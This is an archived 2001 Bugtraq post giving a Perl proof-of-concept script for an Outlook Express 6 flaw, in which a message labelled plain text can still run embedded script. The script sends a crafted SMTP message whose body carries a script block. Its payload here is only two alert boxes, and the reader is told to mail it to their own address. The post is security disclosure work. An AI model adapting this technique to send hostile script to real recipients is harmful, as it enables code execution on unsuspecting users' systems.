Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Proof-Of-Concept Perl Script for Bugtraq-ID: #3334

From: Mario Schmidt <info () pcfon de>
Date: 15 Sep 2001 18:17:22 -0000
Saturday, September 15, 2001

Following is a Proof-Of-Concept script, written in 
Perl, for the Bugtraq-ID: #3334 security issue,
named "Microsoft Outlook Express 6 Plain Text 
Message Script Execution". Credits for this 
issue goes to http-equiv () excite com [mailto:http-
equiv () excite com], who originally found 
this bug.

Usage of this script is very simple. Edit the perl script 
and add your favourite SMTP mail host 
and your e-mail address, as the program parameter 
and finally execute it.

The script is avaible for download as bug3334.pl 
[http://pcfon.de/ms.security/bug3334.pl].

#!/usr/local/bin/perl
#
# bug3334.pl
#
# ms.security
#
# Microsoft Outlook Express 6
# Plain Text Message Script Execution
#
# Proof-Of-Concept Perl Script
#
# Version: [0.0.1]
# Last Edit: [2001-09-15]
# Coding: ms.security [info () pcfon de]
#
# Bugtraq: #3334 
[http://www.securityfocus.com/bid/3334]
# Credit: http-equiv () excite com [http-
equiv () excite com]
#

use Net::SMTP;                          
        # smtp mailer

# *** Program parameter ***

$mailer='mailhost';                             # 
smtp host
$to='your () e-mail com';                       
        # receiver address

# *** Program information ***

@info=
(
  "\nms.security\n\n",
  "Microsoft Outlook Express 6\n",
  "Plain Text Message Script Execution\n\n",
  "Proof-Of-Concept Perl Script\n\n",
  "Version: [0.0.1]\n",
  "Last Edit: [2001-09-15]\n",
  "Coding: ms.security [info\@pcfon.de]\n\n",
  "Bugtraq: #3334 
[http://www.securityfocus.com/bid/3334]\n";,
  "Credit: http-equiv\@excite.com [http-
equiv\@excite.com]\n\n"
);

# *** Message header ***

@header=
(
  'To: ',$to,"\n",
  "MIME-Version: 1.0\n",
  "Content-Type: text/plain\n",
  "charset=\"Windows-1252\"\n",
  "Content-Transfer-Encoding: 7bit\n",
  "X-Priority: 3\n",
  "X-MSMail-Priority: Normal\n",
  "X-Mailer: Microsoft Outlook Express 6.00.2600.0000
\n",
  "X-MIMEOLE: Produced By Microsoft MimeOLE 
V6.00.2600.0000\n",
  "\n"
);

# *** JavaScript code ***

@script=
(
  "<script>",
  "alert(\"freak\");",
  "alert(\"show\")",
  "</script>"
);

# *** Mail message via smtp mailer ***

print @info;                            
        # info message
print "Connecting to $mailer ...\n";            # 
debug message
$smtp = Net::SMTP->new($mailer);                # 
smtp constructor
$smtp->mail($to);                               # 
mail methode
$smtp->to($to);                         
        # to methode
print "Sending messaging to $to ...\n";         # 
debug message
$smtp->data();                          
        # begin of data
$smtp->datasend(@header);                       # 
message header
$smtp->datasend(@script);                       # 
script code
$smtp->dataend();                               # 
end of data
$smtp->quit;                            
        # terminate smtp
print "Done.\n";                                
        # debug message

# (c) 2001, ms.security, Germany. All rights reserved.

ms.security
M. Schmidt 

Web: http://pcfon.de/ms.security/
Mail: mailto:info () pcfon de
Previous By Date Next
Previous By Thread Next

Current thread: